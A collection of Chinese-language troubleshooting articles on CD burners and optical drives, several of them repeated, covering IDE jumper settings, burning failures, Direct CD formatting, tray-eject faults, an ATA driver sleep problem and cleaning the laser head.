    答：此问题多半是因为光盘刻录机与另一个IDE设备使用了同一条数据线，且对用来控制两者主从关系的跳线没有设置好引起的。请参阅相关资料（在光盘刻录机的说明书上有安装说明），将其中一个IDE设备设为主盘（Master），另一个设为从盘（Slave）即可。

    问题二，为什么刻录软件找不到我的光盘刻录机？

    答：此问题可以从三个方面来考虑：

    1. 刻录软件版本太旧，因为目前光盘刻录机硬件的发展速度非常快，往往导致刻录软件不能跟上硬件的更新速度。所以请及时将刻录软件更新到最新版本。

    2. 安装过程中的意外错误。因为系统等方面的原因，导致刻录软件在检测硬件时没有检测到相应的刻录机信息。解决的办法是：将刻录软件卸载并重新安装一次即可。

    3. 系统ASPI（Advanced SCSI Programming Interface，高级SCSI编程接口）驱动程序不全。这是大多数刻录软件会应用到的数据传输接口，如果驱动程序不全，往往会导致找不到刻录机、刻录不稳定、报错等问题。解决的方法是根据使用的操作系统下载相应版本的ASPI驱动程序进行安装即可。

    问题三，我买的CD-RW光盘容量是650MB，为什么用Direct CD格式化之后，容量少了许多？

    答：Direct CD对CD-RW光盘进行格式化时所采用的是UDF格式，也就是封包写入（Packet Writing）的固定长度格式。UDF格式将光盘容量分为一个个大小为32KB的Block，让刻录机对每一个Block做写入及删除的动作，使得CD-RW光盘可像硬盘或软盘一样读写及删除资料。

    但也因为如此，必须牺牲一些空间来记录每一个Block在光盘片上的详细位置，所以会出现容量“丢失”的情况。

    问题四，我用Direct CD刻录成功的光盘能在刻录机上读取，而在我的8x CD-ROM上则无法读取，不知是何原因？

    答：如果能够排除你的CD-ROM读盘能力不佳的原因，那么此问题是因为你的CD-ROM推出时间较早，不支持“multi-read”规范所致。请尝试升级CD-ROM的Firmware，也许能收到意想不到的效果。

    问题五，我将一张CD-R光盘放入刻录机后，计算机告诉我光驱只能使用Direct CD。请问为什么？

    答：看来你使用的刻录软件是Easy CD Creator，它不支持Direct CD格式化过的光盘，所以才会出现你遇到的问题。安装一个Direct CD软件即可解决此问题。

    问题六：为什么“模拟刻录”已经成功， 但真正刻录时还是失败？

    答：刻录机接受刻录程序“模拟刻录”与“刻录”命令的差别在于有无打出激光，其他动作基本相同。所以“模拟刻录”可测试待刻资料是否正常，硬盘速度是否够快，所剩光盘空间是否足够等。但无法得知待刻录的光盘是否有问题，刻录机的激光读写头功率与光盘是否答匹配。

    进行“模拟刻录”成功，但实际刻录失败。说明刻录机与CD-R（W）光盘存在兼容性问题，或是光盘自身存在质量问题。可换一个品牌的CD-R（W）光盘试试。

    除此之外，刻录机激光读写头功率衰减也会出现这种问题。此类问题请找专业人员进行维修。

    问题七，CD-RW光盘可重复擦写多少次？

    答：虽然不同品牌的CD-RW光盘的品质不一，但是大都可重复擦写一千次左右。普通用户几乎不可能使用到CD-RW空白光盘的使用期限。

    如果您的CD-RW空白光盘只重复擦写几次就不能使用了，那么多半是CD-RW光盘出了质量问题，请与经销商联系。

    问题八，请问怎样才能提高刻录的成功率？

    答：此问题涉及的内容比较多，建议从以下几个环节来考虑。

    1. 保证系统内没有病毒干扰。

    2. 尽量将待刻的数据放在本地硬盘上，然后进行刻录。

    3. 刻录前，关闭屏幕保护、病毒防火墙和暂时不用的其他应用程序。

    4. 先进行“模拟刻录”。

    5. 不要长时间连续刻录。

    6. 以略低于刻录机和光盘所支持的最高刻录速度进行刻录。

    做到了以上六点，可以达到较高的刻录成功率。（未完待续）


光盘刻录机常见故障问答集锦

《一键清理系统垃圾》

光盘刻录机常见故障问答集锦

随着价格的不断下跌，光盘刻录机已被越来越多的用户所采用。但在使用过程中，大家也经常会遇到一些问题。下面，我们就针对这些比较常见的问题进行解答，希望能对大家有所帮助。

    问题一，近日本人新买了一台40x的光盘刻录机，回家装好后发现计算机无法启动了，请问是何原因？

    答：此问题多半是因为光盘刻录机与另一个IDE设备使用了同一条数据线，且对用来控制两者主从关系的跳线没有设置好引起的。请参阅相关资料（在光盘刻录机的说明书上有安装说明），将其中一个IDE设备设为主盘（Master），另一个设为从盘（Slave）即可。

    问题二，为什么刻录软件找不到我的光盘刻录机？

    答：此问题可以从三个方面来考虑：

    1. 刻录软件版本太旧，因为目前光盘刻录机硬件的发展速度非常快，往往导致刻录软件不能跟上硬件的更新速度。所以请及时将刻录软件更新到最新版本。
    2. 安装过程中的意外错误。因为系统等方面的原因，导致刻录软件在检测硬件时没有检测到相应的刻录机信息。解决的办法是：将刻录软件卸载并重新安装一次即可。
    3. 系统ASPI（Advanced SCSI Programming Interface，高级SCSI编程接口）驱动程序不全。这是大多数刻录软件会应用到的数据传输接口，如果驱动程序不全，往往会导致找不到刻录机、刻录不稳定、报错等问题。解决的方法是根据使用的操作系统下载相应版本的ASPI驱动程序进行安装即可。

    问题三，我买的CD-RW光盘容量是650MB，为什么用Direct CD格式化之后，容量少了许多？

    答：Direct CD对CD-RW光盘进行格式化时所采用的是UDF格式，也就是封包写入（Packet Writing）的固定长度格式。UDF格式将光盘容量分为一个个大小为32KB的Block，让刻录机对每一个Block做写入及删除的动作，使得CD-RW光盘可像硬盘或软盘一样读写及删除资料。但也因为如此，必须牺牲一些空间来记录每一个Block在光盘片上的详细位置，所以会出现容量“丢失”的情况。

    问题四，我用Direct CD刻录成功的光盘能在刻录机上读取，而在我的8x CD-ROM上则无法读取，不知是何原因？

    答：如果能够排除你的CD-ROM读盘能力不佳的原因，那么此问题是因为你的CD-ROM推出时间较早，不支持“multi-read”规范所致。请尝试升级CD-ROM的Firmware，也许能收到意想不到的效果。

    问题五，我将一张CD-R光盘放入刻录机后，计算机告诉我光驱只能使用Direct CD。请问为什么？

    答：看来你使用的刻录软件是Easy CD Creator，它不支持Direct CD格式化过的光盘，所以才会出现你遇到的问题。安装一个Direct CD软件即可解决此问题。

    问题六：为什么“模拟刻录”已经成功， 但真正刻录时还是失败？

    答：刻录机接受刻录程序“模拟刻录”与“刻录”命令的差别在于有无打出激光，其他动作基本相同。所以“模拟刻录”可测试待刻资料是否正常，硬盘速度是否够快，所剩光盘空间是否足够等。但无法得知待刻录的光盘是否有问题，刻录机的激光读写头功率与光盘是否答匹配。 进行“模拟刻录”成功，但实际刻录失败。说明刻录机与CD-R（W）光盘存在兼容性问题，或是光盘自身存在质量问题。可换一个品牌的CD-R（W）光盘试试。 除此之外，刻录机激光读写头功率衰减也会出现这种问题。此类问题请找专业人员进行维修。

    问题七，CD-RW光盘可重复擦写多少次？

    答：虽然不同品牌的CD-RW光盘的品质不一，但是大都可重复擦写一千次左右。普通用户几乎不可能使用到CD-RW空白光盘的使用期限。如果您的CD-RW空白光盘只重复擦写几次就不能使用了，那么多半是CD-RW光盘出了质量问题，请与经销商联系。

    问题八，请问怎样才能提高刻录的成功率？

    答：此问题涉及的内容比较多，建议从以下几个环节来考虑。

    1. 保证系统内没有病毒干扰。
    2. 尽量将待刻的数据放在本地硬盘上，然后进行刻录。
    3. 刻录前，关闭屏幕保护、病毒防火墙和暂时不用的其他应用程序。
    4. 先进行“模拟刻录”。
    5. 不要长时间连续刻录。
    6. 以略低于刻录机和光盘所支持的最高刻录速度进行刻录。

    做到了以上六点，可以达到较高的刻录成功率。


光盘刻录机常见问题

《一键清理系统垃圾》

光盘刻录机常见问题

随着价格的不断下跌，光盘刻录机已被越来越多的用户所采用。但在使用过程中，大家也经常会遇到一些问题。下面，我们就针对这些比较常见的问题进行解答，希望能对大家有所帮助。

    问题一，近日本人新买了一台40x的光盘刻录机，回家装好后发现计算机无法启动了，请问是何原因？

    答：此问题多半是因为光盘刻录机与另一个IDE设备使用了同一条数据线，且对用来控制两者主从关系的跳线没有设置好引起的。请参阅相关资料（在光盘刻录机的说明书上有安装说明），将其中一个IDE设备设为主盘（Master），另一个设为从盘（Slave）即可。

    问题二，为什么刻录软件找不到我的光盘刻录机？

    答：此问题可以从三个方面来考虑：

    1. 刻录软件版本太旧，因为目前光盘刻录机硬件的发展速度非常快，往往导致刻录软件不能跟上硬件的更新速度。所以请及时将刻录软件更新到最新版本。
    2. 安装过程中的意外错误。因为系统等方面的原因，导致刻录软件在检测硬件时没有检测到相应的刻录机信息。解决的办法是：将刻录软件卸载并重新安装一次即可。
    3. 系统ASPI（Advanced SCSI Programming Interface，高级SCSI编程接口）驱动程序不全。这是大多数刻录软件会应用到的数据传输接口，如果驱动程序不全，往往会导致找不到刻录机、刻录不稳定、报错等问题。解决的方法是根据使用的操作系统下载相应版本的ASPI驱动程序进行安装即可。

    问题三，我买的CD-RW光盘容量是650MB，为什么用Direct CD格式化之后，容量少了许多？

    答：Direct CD对CD-RW光盘进行格式化时所采用的是UDF格式，也就是封包写入（Packet Writing）的固定长度格式。UDF格式将光盘容量分为一个个大小为32KB的Block，让刻录机对每一个Block做写入及删除的动作，使得CD-RW光盘可像硬盘或软盘一样读写及删除资料。

    但也因为如此，必须牺牲一些空间来记录每一个Block在光盘片上的详细位置，所以会出现容量“丢失”的情况。

    问题四，我用Direct CD刻录成功的光盘能在刻录机上读取，而在我的8x CD-ROM上则无法读取，不知是何原因？

    答：如果能够排除你的CD-ROM读盘能力不佳的原因，那么此问题是因为你的CD-ROM推出时间较早，不支持“multi-read”规范所致。请尝试升级CD-ROM的Firmware，也许能收到意想不到的效果。

    问题五，我将一张CD-R光盘放入刻录机后，计算机告诉我光驱只能使用Direct CD。请问为什么？

    答：看来你使用的刻录软件是Easy CD Creator，它不支持Direct CD格式化过的光盘，所以才会出现你遇到的问题。安装一个Direct CD软件即可解决此问题。

    问题六：为什么“模拟刻录”已经成功， 但真正刻录时还是失败？

    答：刻录机接受刻录程序“模拟刻录”与“刻录”命令的差别在于有无打出激光，其他动作基本相同。所以“模拟刻录”可测试待刻资料是否正常，硬盘速度是否够快，所剩光盘空间是否足够等。但无法得知待刻录的光盘是否有问题，刻录机的激光读写头功率与光盘是否答匹配。进行“模拟刻录”成功，但实际刻录失败。说明刻录机与CD-R（W）光盘存在兼容性问题，或是光盘自身存在质量问题。可换一个品牌的CD-R（W）光盘试试。

    除此之外，刻录机激光读写头功率衰减也会出现这种问题。此类问题请找专业人员进行维修。

    问题七，CD-RW光盘可重复擦写多少次？

    答：虽然不同品牌的CD-RW光盘的品质不一，但是大都可重复擦写一千次左右。普通用户几乎不可能使用到CD-RW空白光盘的使用期限。

    如果您的CD-RW空白光盘只重复擦写几次就不能使用了，那么多半是CD-RW光盘出了质量问题，请与经销商联系。

    问题八，请问怎样才能提高刻录的成功率？

    答：此问题涉及的内容比较多，建议从以下几个环节来考虑。
    1. 保证系统内没有病毒干扰。
    2. 尽量将待刻的数据放在本地硬盘上，然后进行刻录。
    3. 刻录前，关闭屏幕保护、病毒防火墙和暂时不用的其他应用程序。
    4. 先进行“模拟刻录”。
    5. 不要长时间连续刻录。
    6. 以略低于刻录机和光盘所支持的最高刻录速度进行刻录。

    做到了以上六点，可以达到较高的刻录成功率。


光驱

《一键清理系统垃圾》

光驱

[color=Green]光驱是电脑硬件中使用寿命最短的配件之一。其实很多报废的光驱仍有很大的利用价值，只要略微维修一下就可以了。这往往不需要具有什么高深的无线电专业知识，也不需要使用什么太复杂的维修工具及材料。你只要细心观察故障现象并参照执行下面的一些排除方法，相信你的老光驱还是能恢 复昔日“风采”的。
[/color]
[color=Red]常见故障一：光驱工作时硬盘灯始终闪烁[/color]
[color=Blue]这是一种假象，实际上并非如此。硬盘灯闪烁是因为光驱与硬盘同接在一个IDE接口上，光盘工作时也控制了硬盘灯的结果。可将光驱单元独接在一个IDE接口上。 [/color]

[color=Red]常见故障二：在Windows环境下对CD-ROM进行操作时显示 “32磁盘访问失败”，然后死机 [/color]
[color=Blue]很显然，Windows的32位磁盘存取对CD-ROM有一定的影响。CD-ROM大部分接在硬盘的IDE接口上，不支持
Windows的32位磁盘存取功能，使Windows产生了内部错误而死机。进入Windows后，在“主群组”中双击“控制面板”，进入“386增强模式”设置，单击“虚拟内存”按钮后再单击“更改”，把左下角的“32位磁盘访问”核实框关闭，在确认后，再重启动Windows,在Windows中再访问CD-ROM进就不会出错误。
[/color]

[color=Red]常见故障三：光驱无法正常读盘，屏幕上显示：“驱动器X上没有磁盘，插入磁盘再试”，或"CDR101:NOT
READY READING DRIVE X ABORT .RETRY.FALL?"偶尔进出盒几次也都读盘，但不久又不读盘。[/color]
[color=Blue][/color]

[color=Blue]在此情况下，应先检测病毒，用杀毒软件进行对整机进行查杀毒，如果没有发现病毒可用文件编辑软件打开C盘根目录下的CONFIG.SYS”文件，查看其中是否又挂上光驱动程序及驱动程序是否被破坏，并进行处理，还可用文本编辑软件查看"AUIOEXEC.BAT"文件中是否有"MSCDEX.EXE/D:MSCDOOO /M:20/V".若以上两步未发现问题，可拆卸光驱维修。
[/color]

[color=Red]常见故障四：光驱使用时出现读写错误或无盘提示 [/color]
[color=Blue]这种现象大部分是在换盘时还没有就位就对光驱进行操作所引起的故障。对光驱的所有的操作都必需要等光盘指示灯显示为就好位时才可进行操作。在播放影碟时也应将时间调到零时再换盘，这样就可以避免出现上述错误。[/color]

[color=Red]常见故障五：在播放电影VCD时出现画面停顿或破碎现象 [/color]
[color=Blue]检查一下AUTOEXEC.BAT文件中的“SMARTDRV”是否放在MSCDEX.EXE之后。若是，则应将SMARTDRV语句放
到MSCDEX.EXE之前；不使用光驱的高速党组地冲程序，改为SMARTDRV.EXE/U;故障即可排除。
[/color]

[color=Red]常见故障六：光驱在读数据时，有时读得不出，并且读盘的时间变长 [/color]
[color=Blue]光驱读盘不出的硬件故障主要集中在激光头组件上，且可分为二种情况：一种是使用太久造成激光管老
化；另一种是光电管表面太脏或激光管透镜太脏及位移变形。所以在对激光管功率进行调整时，还需对光电管和激光管透镜进行清洗。

    光电管及聚焦透镜的清洗方法是：拔掉连接激光头组件的一组扁平电缆，记住方向，拆开激光头组件。这时能看到护套罩着激光头聚焦透镜，去掉护套后会发现聚焦透镜由四根细铜丝连接到聚焦、寻迹线圈上，光电管组件安装在透镜正下方的小孔中。用细铁丝包上棉花沾少量蒸馏水擦拭（不可用酒精擦拭光电管和聚焦透镜表面），并看看透镜是否水平悬空正对激光管，否则须适当调整。至此，清洗工作完毕。

    调整激光头功率。在激光头组件的侧面有1个像十字螺钉的小电位器。用色笔记下其初始位置，一般先顺时针旋转5°～10°，装机试机不行再逆时针旋转5°～10°，直到能顺利读盘。注意切不可旋转太多，以免功率太大而烧毁光电管。
[/color]

[color=Red]常见故障七：开机检测不到光驱或者检测失败 　[/color]
[color=Blue][这有可能是由于光驱数据线接头松动、硬盘数据线损毁或光驱跳线设置错误引起的，遇到这种问题的时
候，我们首先应该检查光驱的数据线接头是否松动，如果发现没有插好，就将其重新插好、插紧。如果这样仍然不能解决故障，那么我们可以找来一根新的数据线换上试试。这时候如果故障依然存在的话，我们就需要检查一下光盘的跳线设置了，如果有错误，将其更改即可


光驱常见故障排除

《一键清理系统垃圾》

光驱常见故障排除

光驱是电脑硬件中使用寿命最短的配件之一。其实很多报废的光驱仍有很大的利用价值，只要略微维修一下就可以了。这往往不需要具有什么高深的无线电专业知识，也不需要使用什么太复杂的维修工具及材料。你只要细心观察故障现象并参照执行下面的一些排除方法，相信你的老光驱还是能恢 复昔日“风采”的。

    常见故障一：光驱工作时硬盘灯始终闪烁

    这是一种假象，实际上并非如此。硬盘灯闪烁是因为光驱与硬盘同接在一个IDE接口上，光盘工作时也控制了硬盘灯的结果。可将光驱单元独接在一个IDE接口上。

    常见故障二：在Windows环境下对CD-ROM进行操作时显示“32磁盘访问失败”，然后死机

    很显然，Windows的32位磁盘存取对CD-ROM有一定的影响。CD-ROM大部分接在硬盘的IDE接口上，不支持 Windows的32位磁盘存取功能，使Windows产生了内部错误而死机。进入Windows后，在“主群组”中双击“控制面板”，进入“386增强模式”设置，单击“虚拟内存”按钮后再单击“更改”，把左下角的“32位磁盘访问”核实框关闭，在确认后，再重启动Windows,在Windows中再访问CD-ROM进就不会出错误。

    常见故障三：光驱无法正常读盘，屏幕上显示：“驱动器X上没有磁盘，插入磁盘再试”，或"CDR101:NOT READY READING DRIVE X ABORT .RETRY.FALL?"偶尔进出盒几次也都读盘，但不久又不读盘。

    在此情况下，应先检测病毒，用杀毒软件进行对整机进行查杀毒，如果没有发现病毒可用文件编辑软件打开C盘根目录下的CONFIG.SYS”文件，查看其中是否又挂上光驱动程序及驱动程序是否被破坏，并进行处理，还可用文本编辑软件查看"AUIOEXEC.BAT"文件中是否有"MSCDEX.EXE/D:MSCDOOO /M:20/V".若以上两步未发现问题，可拆卸光驱维修。

    常见故障四：光驱使用时出现读写错误或无盘提示

    这种现象大部分是在换盘时还没有就位就对光驱进行操作所引起的故障。对光驱的所有的操作都必需要等光盘指示灯显示为就好位时才可进行操作。在播放影碟时也应将时间调到零时再换盘，这样就可以避免出现上述错误。

    常见故障五：在播放电影VCD时出现画面停顿或破碎现象

    检查一下AUTOEXEC.BAT文件中的“SMARTDRV”是否放在MSCDEX.EXE之后。若是，则应将SMARTDRV语句放 到MSCDEX.EXE之前；不使用光驱的高速党组地冲程序，改为SMARTDRV.EXE/U;故障即可排除。

    常见故障六：光驱在读数据时，有时读得不出，并且读盘的时间变长

    光驱读盘不出的硬件故障主要集中在激光头组件上，且可分为二种情况：一种是使用太久造成激光管老 化；另一种是光电管表面太脏或激光管透镜太脏及位移变形。所以在对激光管功率进行调整时，还需对光电管和激光管透镜进行清洗。

    光电管及聚焦透镜的清洗方法是：拔掉连接激光头组件的一组扁平电缆，记住方向，拆开激光头组件。这时能看到护套罩着激光头聚焦透镜，去掉护套后会发现聚焦透镜由四根细铜丝连接到聚焦、寻迹线圈上，光电管组件安装在透镜正下方的小孔中。用细铁丝包上棉花沾少量蒸馏水擦拭（不可用酒精擦拭光电管和聚焦透镜表面），并看看透镜是否水平悬空正对激光管，否则须适当调整。至此，清洗工作完毕。

    调整激光头功率。在激光头组件的侧面有1个像十字螺钉的小电位器。用色笔记下其初始位置，一般先顺时针旋转5°～10°，装机试机不行再逆时针旋转5°～10°，直到能顺利读盘。注意切不可旋转太多，以免功率太大而烧毁光电管。

    常见故障七：开机检测不到光驱或者检测失败

    这有可能是由于光驱数据线接头松动、硬盘数据线损毁或光驱跳线设置错误引起的，遇到这种问题的时 候，我们首先应该检查光驱的数据线接头是否松动，如果发现没有插好，就将其重新插好、插紧。如果这样仍然不能解决故障，那么我们可以找来一根新的数据线换上试试。这时候如果故障依然存在的话，我们就需要检查一下光盘的跳线设置了，如果有错误，将其更改即可。


光驱出盒异常的原因及对策

《一键清理系统垃圾》

光驱出盒异常的原因及对策

现在普通光驱或者DVD驱动器已成了计算机的标准配置。在使用光驱时，你也许碰到过这样的事情，想用光驱的时候，怎么也打不开仓门。下面笔者就将维修中遇到的光驱出盒异常情况做如下归纳，希望对大家有所裨益。

    问题一:光驱有时可以出盒，有时不出盒。

    原因及对策:

    1.光驱内部许多机械部分都是靠齿轮和皮带进行传动的，由于皮带老化、松动，导致传动力量不足，托盘无法弹出。另外，传动部件打滑也会造成托盘弹不出。采取的措施是更换皮带，或将传动部件用无水酒精清洗，必要时可在传动皮带与传动轮之间加一点松香粉末，以增加摩擦力；
    2.托盘下侧的齿轮磨损或断裂。这种情况一般是外力所致，只有更换托盘，一般可从旧光驱上拆取，对于齿轮磨损的，可以适当调整机芯上的传动轮的位置，使二者啮合紧密些；
    3.电路板上出盒按键出现虚焊导致接触不良，也会出现时而出盒正常，时而不正常现象，将虚焊处补焊后即可。此外，有些不出盒故障，在主机重新启动后又正常，这一般是程序控制器出现紊乱或死锁所致；出盒电机(直流电阻在10欧姆左右)使用日久，出现磨损，导致力矩减小，结果出现出盒正常，进盒不到位现象；出盒电机驱动集成块损坏导致出盒不正常的情况比较少，这时可通过测量电机两端的电压来判断。

问题二:光驱出盒不正常，表现为出盒后立即进盒，进盒正常。

    原因及对策:这种情况一般是托盘检测开关不良导致CPU检测不到托盘的正常状态，使托盘不断重复进出盒动作。光驱一般在机芯下面有一个托盘检测开关，该开关由中间一个动臂和两个弯成“M”的固定臂构成，在三个臂(金属片)上都有触点，光驱就是通过这几个触点的闭合状态来判断托盘的状态，出现这种故障时如果光驱没有经过拆卸，也没有受到剧烈撞击，基本上可以排除因为零件变形、移位等原因导致脱盘碰触不到检测开关的可能性。这时，只要用无水酒精清洗触点，如果触点很脏或氧化严重，可用细砂纸轻轻擦一下，然后再清洗干净即可。如果光驱经过拆卸，或者用外力推过托盘后才出现这种现象，则一般是托盘上的从动齿轮和机芯上的主动齿轮发生移位，导致主动齿轮下的一个横杆不能推动检测开关上的一个动臂，使开关的状态发生反转，这时只有拆开光驱仔细调整两个齿轮的位置才能解决问题。

    问题三:光驱使用中有时出现死机，不出盒现象。

    原因及对策:这种情况可能是使用的光盘较差引起的。这时可以注意到光驱的读盘指示灯一直是亮着的，光驱一直在试图读盘，由于占用大量的系统资源会导致死机，这时强行按出盒键也无效，如果按“Ctrl+Alt+Del”键也无法结束当前任务的话，那只有重新启动机器才行。如果指示灯熄灭了的话，按出盒键不出盒，可以用一回形针从面板紧急出盒孔里适当用力捅进去，一般就可以出盒了。

    问题四:按光驱出盒键，听见里面有响声，感觉有出盒动作，但托盘就是伸不出来，有时即使从光驱的紧急出盒孔也无法把光驱打开。

    原因及对策:

    1.出盒电机本身有故障(一般是使用时间较长的光驱)，出盒电机由于磨损，转矩减小，只有更换电机才能解决；
    2.使用光驱时，不是按光驱面板的进出键，而是用手去推托盘，由于推的角度偏差，导致光驱传动部件变形、卡死，这时只有拆开光驱，将卡住部分校正才行；
    3.有些光驱的主轴电机上托盘(中间有超强磁铁)与上压盘组件吸合比较紧密也会导致不出盒。这时我们可以在上压盘组件的圆铁片下面贴上两层纸或胶布来减小主轴电机上托盘与上压盘组件间的吸合力就可以解决问题；
    4.有些采用塑料机芯的高速光驱，光头支架的前端两侧容易发生断裂，导致托盘被卡住，这时只有将光驱拆开，将断裂处用502胶水粘上，另外还要用一点塑料适当加固断裂处才比较牢固。

    光驱使用的一些注意事项

    1.光驱正在读盘(光驱灯亮)时最好不要强行去按光驱面板上的弹出键，等指示灯灭了才能按弹出键，否则很可能使光驱的主轴电机发生故障。
2.用光盘时，不要图省事，不按光驱面板的弹出键，而直接去推光驱的托盘架，由于推的角度偏差和用力不均，很可能造成光驱传动部分出现故障(变形、卡死)！3.当光盘读不出时，不要在光盘上面再加一张光盘或粘上纸片胶布等，去压住下面要读的盘，这样很可能造成光盘塞在里面退不出来，甚至使用退出孔退盘也不行。4.不要在光驱内有盘的情况下侧着机箱开机，除非光驱是吸盘式的，否则会损坏光驱。


光驱导致的STR功能失常

《一键清理系统垃圾》

光驱导致的STR功能失常

眼下不少主板都同时支持ATA100和STR。但ATA100和STR这两种新技术还有些“娇嫩”，拥有支持这两种新技术的主板和硬盘，并不一定就可以让我们轻松享受由它们带来的好处，如果安装调试不得法，在某些系统中，某些硬件可能会跟你捣乱。笔者最近就遇到了这种麻烦：爱机进入“等待”状态后，我的北极熊光驱总是沉睡不醒，造成STR功能失常，要热启动后才能唤醒电脑。
    笔者机子的基本配置为PⅢ 866 CPU、技嘉GA-60XM7E主板（i815E）、IBM腾龙Ⅱ代30GB硬盘（此款主板同时支持Ultra　ATA100和STR这两项新技术，腾龙Ⅱ代硬盘也支持Ultra　ATA100）、千禧条128MB内存（PC133）、LG未来窗795FTplus显示器、北极熊48速光驱。操作系统为Windows Me，相关驱动程序为：Intel 815显示芯片驱动程序6.1版，Intel 6.10.011多语言版Ultra ATA Storate驱动程序。
    完成主板跳线、设置好CMOS相关选项，装好Windows Me和Intel 815显示芯片6.1版驱动程序，试用STR功能正常。我分别用“按电源按钮”和“定时”两种方式进入“等待”状态，机器都能准确“关机”（其实是内存处于供电状态，别的部件皆进入关闭状态），随时双击鼠标，电脑都能在几秒钟内被唤醒，桌面自动恢复到待机前的状态。但安装Intel 6.10.011多语言版Ultra ATA Storate驱动程序以后，机子就再也无法正常睡眠了──常常不能真正入睡，只能像一般的机器那样“假寐”，即通着电，电扇仍呼呼地工作着；偶而安静入眠，可怎么也唤不醒，总是“灰屏”，只好按Reset键来唤醒它。
    用“减法” 和“替换法”试验证明，在不安装光驱和用源兴24速光驱替换北极熊48速光驱这两种情况下，STR功能都正常。原来是北极熊在捣乱，导致电脑唤不醒。经过反复摸索得知，安装Intel 6.10.011多语言版Ultra ATA Storate驱动程序后，硬盘控制器的两个IDE接口分别以UDMA5和UDMA2传输模式工作，而我的北极熊48速光驱不能很好地支持UDMA2传输模式（能工作，但唤不醒）。对症下药，我找到了两种解决的办法：
    办法一:有选择地安装Ultra ATA Storage Driver。先卸载Intel 6.10.011多语言版Ultra ATA Storate驱动程序，然后用“setup/a” 安装参数运行Ultra ATA Storage Driver。这样可以提取所有的驱动程序文件而不安装驱动程序本身（若不设定路径，则文件将放到C:\Program Files\Intel\Ultra ATA Storage Driver目录下）。然后手工更新Intel（r） 82801BA Ultra　ATA Storage Controller和Primary IDE controller 的驱动程序（注意，不要更新Secondary IDE controller）。方法是依次打开“控制面板/系统/设备管理器/硬盘控制器”，选择需要更新驱动程序的项目，打开“属性/驱动程序/更新驱动程序”，选择“指定驱动程序的位置”，按“下一步”，勾选“指定位置”，按“浏览”，选定刚才存放提取文件的位置，选择“WINME”，“确定” ，重新启动电脑。
    办法二:手工更改CDROM的传输模式。自动安装Ultra ATA Storage Drive6.10版后，选择“程序/Intel Ultra ATA Storage Drive” ，打开“Companion”，选择“设备参数”，选择CDROM设备，手工将“传输模式限度”由“不限制”改为“DMA MW-2”或“PIO-4”，“确定” ，“立即提交更改” ，重新启动电脑。这样光驱所连的主板IDE接口就会以“DMA MW-2”或“PIO-4” 传输模式来联络光驱，STR功能恢复正常。
    总结：某些硬件可能导致电脑无法正常入睡和唤醒，比如光驱。遇到这类问题应先用减法和替换法诊断问题所在，确诊后若不愿或不能更换相关硬件，则可在“驱动” 二字上想办法。另外，反复折腾，多次添加、删除程序后，电脑可能无法自动“入睡” ，多数情况下，运行“维护向导” ，对系统进行维护（清理、扫描、整理磁盘）即可解决问题。


光驱的拆卸与清洗

《一键清理系统垃圾》

光驱的拆卸与清洗

    随着使用的增多，光驱的问题也越来越多：小毛病就挑挑盘，大毛病干脆不读盘。究其原因，一是激光头灰尘过多影响透镜读盘，二是激光管老化，导致激光头功率不足无法读盘。原因找到以后，就可以对症下药了：
        一、光驱的拆卸
        1.前面板的拆卸（^11030502a^1）
        首先切断计算机电源，然后拆开机箱把光驱从5.25英寸驱动器槽中取出，拔去相应的IDE数据线以及音频线。找一根牙签，或是细铁丝之类的东西，伸入到光驱的应急弹出孔中，把光驱仓门打开，便于下一步的拆卸。
        还有一种方法：在计算机电源接通的情况下，让光驱弹开之后再切断计算机电源，不过从机箱里拆卸光驱时就比较麻烦了。光驱的仓门打开之后，在光驱的左右两侧，会发现光驱的前面板是用两个塑料小卡子，卡在了光驱的外壳上。用手按下那个卡子，再用力抠开前面板，这样光驱面板的拆卸就完成了。
        2.外壳的拆卸（^11030502b^2、^11030502c^3）
        在光驱的外壳四周，左右两边各有两颗螺丝，底部共有四颗螺丝。用螺丝刀一一将其拆除，然后将上下两部分壳体分离。这样就打开了光驱的外壳，光驱的内部结构就基本呈现出来了。需要补充说明的是：有些光驱外壳上的螺丝型号比较特殊，且“+”字槽比较浅，一般的装机螺丝刀是不行的。在拆卸时，还得注意用力均匀，一不小心就可能造成螺丝滑丝，这种情形可就不好办了。拆去外壳的上半部分后，就会看见一块覆盖在光头组件上的铁板，中间有一圆形物体，它是固定光盘盘片用的，光驱主轴电机开始旋转时就会向上移动，和夹板紧紧地合在一起，固定光盘然后高速旋转。
        3.电路板的拆卸（^11030502d^4）
        在光驱的底部，是一块绿色的PCB印刷电路板。上面有光驱的缓存、解码芯片、BIOS等元件。另外还有一根数据线从PCB电路板上引出，线的另一端接在光驱激光头以及仓门控制电路附近，拆卸时一定要注意。电路板一般也是用螺丝固定在光驱底部的铁外壳上。拆掉螺丝后，电路板就分离出来了，不过还有几根白色的数据线连在光头组件之类的设备上。小心地把数据排线拔掉，注意不要折断数据排线（因为光驱内部的数据排线是那种IDE硬盘线）。现在PCB电路板已彻底地与光头组件分离。清洗PCB电路板我们可以用刷子轻轻刷去PCB电路板上的灰尘。
        4.电机及光头的拆卸（^11030502e^5、^11030502f^6）
        光驱的激光头一般由两部分组成，一部分是激光透镜，一部分是激光头。不过目前有些光驱直接将光头与透镜做到了一起，这样拆卸起来更容易。光驱的电机也分为两种：一种是驱动激光头移动，对光盘进行读操作的主轴电机；一种是驱动光驱仓门进出的伺服电机。有些光驱二者是分离的，有些光驱二者是统一的。电机的拆卸比较方便，卸掉电源线路以及固定螺丝即可卸下。
        二、光驱的清洗及调节激光头功率
        1.齿轮传动设备的清洗
        老式一点的光驱，如24×以下速度的光驱中，很大一部分都是采用皮带传动。由于热胀冷缩，皮带传动比较容易出现故障。光驱仓门进出打滑、卡住等现象，多是由于皮带过于老化。遇到这种情况更换新的皮带即可。而齿轮驱动的光驱则比较容易维护，齿轮出现断齿或磨损严重，也只要换个新的就行了；如果使用的时间较长，可以给齿轮上点润滑油，这样能减少齿轮的磨损，一定程度上可以延长光驱的使用寿命。注意，给齿轮和传动轴加润滑油时，不要沾到光头组件上（最好使用固体润滑油，不使用液体润滑油）。
        2.激光头组件的清洗
